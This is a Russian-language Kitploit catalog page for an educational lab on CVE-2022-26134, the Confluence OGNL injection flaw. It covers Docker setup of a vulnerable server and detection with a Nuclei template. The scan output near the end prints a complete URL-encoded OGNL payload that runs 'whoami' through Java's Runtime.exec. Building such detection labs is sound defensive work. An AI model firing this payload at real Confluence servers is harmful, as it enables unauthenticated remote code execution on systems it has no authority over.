Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-26134-LAB — Detecting CVE-2022-26134 using Nuclei | Kitploit
Инструменты/GitHubGitHub/skhalsa-sigsci/cve-2022-26134-lab
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubskhalsa-sigsci/cve-2022-26134-lab

CVE-2022-26134-LAB

Detecting CVE-2022-26134 using Nuclei

Репозиторий
313 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-26134-LAB

Confluence Server и Confluence Data Center содержат критическую неаутентифицированную уязвимость удаленного выполнения кода, идентифицированную как CVE-2022-26134, согласно сообщению службы безопасности Atlassian от 2 июня 2022 года. Уязвимость не была исправлена на момент публикации 2 июня и активно эксплуатировалась в реальных условиях. По состоянию на 3 июня стали доступны как исправления, так и временное решение.

Этот репозиторий предназначен только для экспериментальных и образовательных целей.

Зависимости

  • Docker
  • Nuclei

Уязвимая среда Confluence

Запуск уязвимой среды

root@kitploit:~
docker-compose up

После запуска вы можете получить доступ к серверу Confluence по следующему URL-адресу:

http://127.0.0.1:8090/

Настройка сервера Confluence

  1. При первом посещении сайта вы пройдете через настройку.
  2. Не устанавливайте никакие флажки и нажмите «Далее» на странице «Получить приложения».
  3. На странице лицензионного ключа нажмите на ссылку «Получить ознакомительную лицензию».
  4. Вы будете перенаправлены на my.atlassian.com. Убедитесь, что выбран тип лицензии Confluence (Data Center). Введите любое название организации. Убедитесь, что переключатель «Ваш экземпляр» установлен в положение «работает». После проверки этих деталей нажмите кнопку «Сгенерировать лицензию».
  5. Появится модальное окно подтверждения с вопросом, хотите ли вы установить лицензию на сервер: 127.0.0.1. Выберите «Да».
  6. Выбор «Да» автоматически заполнит лицензионный ключ на вашем локальном экземпляре Confluence. Нажмите «Далее».
  7. Выберите тип развертывания «Автономный» и нажмите «Далее».
  8. На странице настройки базы данных детали должны быть заполнены следующим образом:
    • Тип базы данных: PostgreSQL
    • Тип установки: Простой
    • Имя хоста: db
    • Порт: 5432
    • Имя базы данных: confluence
    • Имя пользователя: confluence
    • Пароль: 123456789
  9. После заполнения этих полей нажмите кнопку «Проверить соединение». Вы должны получить сообщение «Успешно! База данных подключена успешно». Затем нажмите «Далее».
  10. Начнется настройка базы данных. Это может занять некоторое время. Подождите.
  11. После завершения настройки базы данных вы попадете на страницу «Загрузка контента». Нажмите кнопку «Пример сайта».
  12. Затем на странице «Настройка управления пользователями» выберите «Управление пользователями и группами с помощью Confluence».
  13. Далее на странице «Настройка учетной записи системного администратора» создайте учетную запись и нажмите «Далее».
  14. После завершения вы увидите, что настройка прошла успешно. Нажмите «Начать».
  15. Вас попросят «Создать пространство для хранения ваших материалов». Введите любое название пространства.
  16. Пропустите обучение.
  17. Теперь вы завершили ознакомительную настройку сервера Confluence.

Обнаружение CVE-2022-26134

Уязвимость представляет собой внедрение OGNL, затрагивающее HTTP-сервер. Полезная нагрузка OGNL помещается в URI HTTP-запроса. Похоже, что работает любой тип HTTP-метода: как корректный (GET, POST, PUT и т. д.), так и некорректный (например, «BALH»).

https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

Использование Nuclei

Выполните следующую команду Nuclei:

root@kitploit:~
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml

Результат сканирования

root@kitploit:~
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
Скачать инструмент